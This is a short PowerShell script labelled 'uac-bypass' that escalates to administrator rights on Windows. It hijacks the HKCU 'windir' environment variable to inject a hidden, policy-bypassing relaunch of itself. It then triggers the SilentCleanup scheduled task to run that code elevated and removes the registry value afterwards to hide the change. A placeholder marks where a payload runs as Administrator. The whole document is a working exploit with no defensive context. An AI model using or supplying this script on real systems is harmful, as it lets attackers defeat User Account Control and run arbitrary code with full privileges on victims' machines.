uac-bypass

1. if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
2. #Payload goes here
3. #It'll run as Administrator
4. } else {
5. $registryPath = "HKCU:\Environment"
6. $Name = "windir"
7. $Value = "powershell -ep bypass -w h $PSCommandPath;#"
8. Set-ItemProperty -Path $registryPath -Name $name -Value $Value
9. #Depending on the performance of the machine, some sleep time may be required before or after schtasks
10. schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
11. Remove-ItemProperty -Path $registryPath -Name $name
12. }